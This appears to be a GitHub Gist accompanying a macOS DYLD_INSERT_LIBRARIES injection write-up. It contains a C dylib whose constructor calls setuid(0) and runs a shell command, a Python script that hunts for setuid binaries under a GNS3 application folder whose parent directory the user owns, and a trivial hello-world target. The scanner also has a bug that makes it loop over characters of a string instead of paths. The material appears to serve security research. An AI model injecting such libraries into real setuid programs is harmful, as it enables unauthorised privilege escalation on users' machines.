Last active
December 16, 2024 03:57
-
-
Save theevilbit/3574df063cf9e2c3ba6c57aca5dff022 to your computer and use it in GitHub Desktop.
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <syslog.h> | |
#include <stdlib.h> | |
__attribute__((constructor)) | |
static void customConstructor(int argc, const char **argv) | |
{ | |
setuid(0); | |
system("id"); | |
printf("Hello from dylib!\n"); | |
syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import os | |
import getpass | |
from pathlib import Path | |
binaryPaths = ('/Applications/GNS3/Resources/') | |
username = getpass.getuser() | |
for binaryPath in binaryPaths: | |
for rootDir,subDirs,subFiles in os.walk(binaryPath): | |
for subFile in subFiles: | |
absPath = os.path.join(rootDir,subFile) | |
try: | |
permission = oct(os.stat(absPath).st_mode)[-4:] | |
specialPermission = permission[0] | |
if int(specialPermission) >= 4: | |
p = Path(os.path.abspath(os.path.join(absPath, os.pardir))) | |
if p.owner() == username: | |
print("Potential issue found, owner of parent folder is:", username) | |
print(permission , absPath) | |
except: | |
pass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
int main() { | |
printf("Hello world\n"); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment